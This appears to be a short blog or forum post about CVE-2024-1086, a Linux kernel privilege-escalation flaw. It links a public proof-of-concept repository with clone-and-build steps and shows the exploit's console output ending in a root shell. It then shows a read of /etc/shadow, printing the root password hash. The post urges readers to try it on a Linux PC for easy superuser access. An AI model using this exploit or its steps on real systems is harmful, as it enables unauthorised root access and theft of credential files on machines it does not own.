This is CVE-2024-1086. This allows access to a root prompt without requiring a password. This does work as well as advertised.
Git clone this and then run make to build the Proof Of Concept: https://github.com/Notselwyn/CVE-2024-1086.git.
(jcartwright@2403-4800-25af-b00--2) 192.168.1.5 CVE-2024-1086 $ ./exploit [*] creating user namespace (CLONE_NEWUSER)... [*] creating network namespace (CLONE_NEWNET)... [*] setting up UID namespace... [*] configuring localhost in namespace... [*] setting up nftables... [+] running normal privesc [*] waiting for the calm before the storm... [*] sending double free buffer packet... [*] spraying 16000 pte's... [*] checking 16000 sprayed pte's for overlap... [+] confirmed double alloc PMD/PTE [+] found possible physical kernel base: 00000002c0200000 [+] verified modprobe_path/usermodehelper_path: 00000002c1e5f840 ('/sanitycheck')... [*] overwriting path with PIDs in range 0->4194304...] /bin/sh: 0: can't access TTY; job control turned off. # |
This is very easy to do. Then I got a genuine root prompt with this exploit.
# cat /etc/shadow | head -n 1 root:$6$/lIOyMuIf.xwY7oM$mH.FZ7iptq5oUZnLa75Hqis5FI//N/KjQ0iRqoSl5PmRV4Jfwd4cphgtwCrrJsPlTqZZ2rCK4.maD4cdB4zpC/::0:99999:7::: |
This is using this kernel version. This works up to kernel 6.6 as well.
5.14.0-362.24.1.el9_3.x86_64+ |
This is a very interesting Linux exploit, this does not require root access and would be worth trying on a Linux PC to allow superuser access easily.
Read a very long blog post documenting exactly how this works and how the exploit was found.